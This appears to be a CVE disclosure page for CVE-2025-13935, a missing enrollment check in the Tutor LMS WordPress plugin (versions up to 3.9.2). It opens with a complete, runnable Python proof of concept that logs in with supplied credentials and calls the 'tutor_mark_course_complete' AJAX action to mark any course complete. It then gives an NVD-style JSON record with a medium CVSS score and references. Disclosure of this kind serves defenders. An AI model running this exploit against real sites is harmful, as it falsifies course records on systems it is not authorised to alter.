CVE-2025-13935

# CVE-2025-13935 PoC - Tutor LMS Unauthorized Course Complete # Affected: Tutor LMS <= 3.9.2 # Author: Security Researcher # Reference: https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php import requests import sys from urllib.parse import urljoin def exploit_cve_2025_13935(target_url, username, password, course_id): """ Exploit for CVE-2025-13935: Tutor LMS Missing Enrollment Verification Allows authenticated users to mark any course as complete without enrollment. """ session = requests.Session() # Step 1: Authenticate with WordPress login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print('[-] Authentication failed') return False print('[+] Authentication successful') # Step 2: Mark course as complete without enrollment verification complete_url = urljoin(target_url, '/wp-admin/admin-ajax.php') exploit_data = { 'action': 'tutor_mark_course_complete', 'course_id': course_id } complete_response = session.post(complete_url, data=exploit_data) if complete_response.status_code == 200: print(f'[+] Course {course_id} marked as complete') print(f'[+] Response: {complete_response.text}') return True else: print(f'[-] Exploit failed with status {complete_response.status_code}') return False if __name__ == '__main__': if len(sys.argv) < 5: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <course_id>') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] course = sys.argv[4] exploit_cve_2025_13935(target, user, pwd, course)

{"cve": {"id": "CVE-2025-13935", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.170", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course completion in all versions up to, and including, 3.9.2. This is due to missing enrollment verification in the 'mark_course_complete' function. This makes it possible for authenticated attackers, with subscriber level access and above, to mark any course as completed."}, {"lang": "es", "value": "El plugin de solución de eLearning y cursos en línea Tutor LMS para WordPress es vulnerable a la finalización de cursos no autorizada en todas las versiones hasta la 3.9.2, inclusive. Esto se debe a la falta de verificación de inscripción en la función 'mark_course_complete'. Esto permite a atacantes autenticados, con acceso de nivel suscriptor y superior, marcar cualquier curso como completado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b8b111a-9626-41f4-8a13-51f576af0257?source=cve", "source": "[email protected]"}]}}